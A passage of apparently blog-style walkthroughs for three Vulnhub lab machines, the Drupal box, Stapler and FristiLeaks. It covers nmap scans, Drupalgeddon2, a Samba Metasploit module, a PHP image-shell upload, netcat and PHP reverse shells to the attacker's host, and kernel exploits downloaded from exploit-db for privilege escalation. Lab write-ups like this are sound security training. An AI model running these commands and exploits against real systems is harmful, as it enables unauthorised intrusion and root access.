|     http://192.168.18.88:80/jabc/?q=node%2f3%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.18.88:80/jabc/misc/?C=N%3bO%3dA%27%20OR%20sqlspider
|_    http://192.168.18.88:80/jabc/misc/?C=D%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2014-0226   6.8     https://vulners.com/cve/CVE-2014-0226
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3523   5.0     https://vulners.com/cve/CVE-2014-3523
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2020-11985  4.3     https://vulners.com/cve/CVE-2020-11985
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2014-0118   4.3     https://vulners.com/cve/CVE-2014-0118
|       CVE-2014-0117   4.3     https://vulners.com/cve/CVE-2014-0117
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612
6667/tcp open  irc     ngircd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
MAC Address: 08:00:27:6B:9D:FC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.18.88

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 366.39 seconds

Lets visit the website running in the machine.

Lets go to the website now.

Looks like the site is running on Drupal. Lets do a scan using Droopescan.

droopescan scan drupal -u http://192.168.18.88/jabc

Seems like the Drupal version is 7.22 – 7.26

Lets look for vulnarabilites now.

Have a look here: https://github.com/dreadlocked/Drupalgeddon2

Looks like works in Drupal 7.x. Lets try that

ruby drupalgeddon2.rb http://192.168.18.88/jabc

We got a shell! Lets check the user.

Time for Privilege escalation. First lets get a shell through netcat

Start a listener in kali.

[email protected]:~# nc -nlvp 7777

and connect from victim machine.

nc -e /bin/sh 192.168.18.87 7777

Done.

Time for Privilege Escalation

Lets search for the OS information.

uname -a

Now search for Ubuntu 3.13 exploits using searchsploit.

searchsploit ubuntu 3.13

Lets try the first one. Linux Kernel 3.13.0 < 3.19 exploit.

wget the file to machine.

wget https://www.exploit-db.com/download/37292

Now rename the file to 37292.c and compile.

mv 37292 37292.c
gcc -o exploit 37292.c

Make sure that the exploit is there. and enter ./exploit to run it.

and… We are root!

Lets find the flag.

cd /root
cat flag.txt

Lets do another machine next day!

Stapler: 1 Vulnhub Machine Walkthrough

Lets find out the IP first with nmap

nmap 192.168.18.0/24

The IP is 192.168.18.85.

Lets run an extended scan to enumerate the services and versions, with a basic vulnerability scan in nmap.

[email protected]:~# nmap -sV -O -A -T5 --script vuln 192.168.18.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:00 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).

Nmap scan report for 192.168.18.85
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp   open   domain      dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:thekelleys:dnsmasq:2.75: 
|       CVE-2019-14513  5.0     https://vulners.com/cve/CVE-2019-14513
|_      CVE-2019-14834  4.3     https://vulners.com/cve/CVE-2019-14834
80/tcp   open   http        PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                    
|       the target web server and sending a partial request. By doing so, it starves 
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp  open   doom?
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
MAC Address: 08:00:27:EC:EF:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.18.85

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 565.32 seconds

Didnt find anything interesting from the port 80 web page, nikto and gobuster scan.

samba is running on port 139. Lets try to exploit it before going to ftp.

msfconsole
msf5 > msf5 > use exploit/linux/samba/is_known_pipename

Now set the options

Time to run the exploit. Enter run

We got the root. Now lets read the flag.

cat /root/flag.txt

Finished! Thats all for today.

FristiLeaks: 1.3 Vulnhub Walkthrough

Hi, Lets see how we rooted Fristi by Ar0xA from Vulnhub.

First Find the IP and do a port scan.

We have only one port open. Lets scan using Nikto and Gobuster.

Now Gobuster.

Visit the pages found. Nothing inetersting. Right?

We need to find something else. Have a look at the following address.

http://192.168.18.80/fristi/

A login page right?

Lets bry breaking it. SQL Injection didnt work. There must be some other ways. Lets have a look at the source code.

<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->

Need to look more 🙂 Scroll down to the end.

<!-- 
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->

Looks like this is base64 encoded. Lets try decoding.

visit https://www.base64decode.org/ for decoding.

Seems like a PNG image? Lets try decoding as an image here: https://base64.guru/converter/decode/image/png

We got an Image.

Hope this is the password. But what about the username? admin? fristi?

they didnt work. Lets try eezeepz.

Yes. We are logged in now. We have a file upload form here. But it accepts only images.

We need to upload a php shell as an image here.

I used this shell

https://github.com/melbinkm/PHPImageShell

Rename the file to shell.php.gif and upload.

Fire up Burpsuite and catch the upload request.

Edit the filename in the request to shell.php.gif and send.

we will get a response as uploaded to uploads directory. Now head to /uploads/shell.php.gif

Now we can set up a listener in our kali machine and connect from this shell.

nc -nlvp 4444

Enter the following command and click Exec.

php -r '$sock=fsockopen("192.168.18.79",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

We got a connection to our Kali machine.

Now its the time for privilege escalation. Use the command uname -a to know the OS version.

Lets search for an exploit.

What about usng this?

https://www.exploit-db.com/exploits/40839

Lets try

Lets download the file using wget.

Time to compile and run the exploit.

Done! we gave a new user firefart with password pass.

Lets see if it is present on /etc/passwd

Yes, Its there at the top. Now lets move to our new account and check our root access.

Yes! we are root now. What about the flag?

Thats all. It took a little more time for me to find the fristi directory, But the privlege escalation part was quick.